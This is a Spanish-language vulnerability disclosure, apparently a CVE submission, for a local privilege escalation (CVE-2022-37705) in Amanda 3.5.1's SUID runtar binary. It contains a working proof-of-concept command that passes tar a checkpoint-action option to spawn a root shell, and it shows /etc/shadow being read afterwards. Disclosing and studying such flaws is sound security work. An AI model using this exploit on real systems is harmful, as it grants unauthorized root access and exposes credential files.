
Amanda 3.5.1 segundo LPE.
[Descripción sugerida] Se encontró una falla de escalada de privilegios en Amanda 3.5.1 que puede llevar al usuario de backup a privilegios de root. El componente vulnerable es el SUID runtar, que es solo un envoltorio para ejecutar /usr/bin/tar con argumentos específicos que son controlables por el atacante. El programa no verifica correctamente los argumentos pasados al binario tar (asume que todos los argumentos deben ser como --ARG VALOR, pero podemos proporcionar --ARG=VALOR como un solo argumento).
[Información adicional] Esta falla se puede utilizar para ejecución de código, denegación de servicio, escalada de privilegios y divulgación de información. Este es el PoC para explotarlo y obtener un shell de root: backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied
backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names
head /etc/shadow
root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::
[Tipo de vulnerabilidad Otro] Verificación de argumentos defectuosa.
[Vendedor del producto] Amanda
[Base de código del producto afectado] runtar - 3.5.1
[Componente afectado] El binario SUID afectado es: runtar El archivo afectado es: runtar.c Las líneas de código afectadas comienzan en la línea 162.
[Tipo de ataque] Local
[Impacto Ejecución de código] true
[Impacto Denegación de servicio] true
[Impacto Escalada de privilegios] true
[Impacto Divulgación de información] true
[Vectores de ataque] Para explotar el binario, solo hay que proporcionar argumentos manipulados al binario SUID runtar para escalar a root.
[Referencia] http://www.amanda.org/
[Descubridor] Maher Azzouzi
Utilice CVE-2022-37705.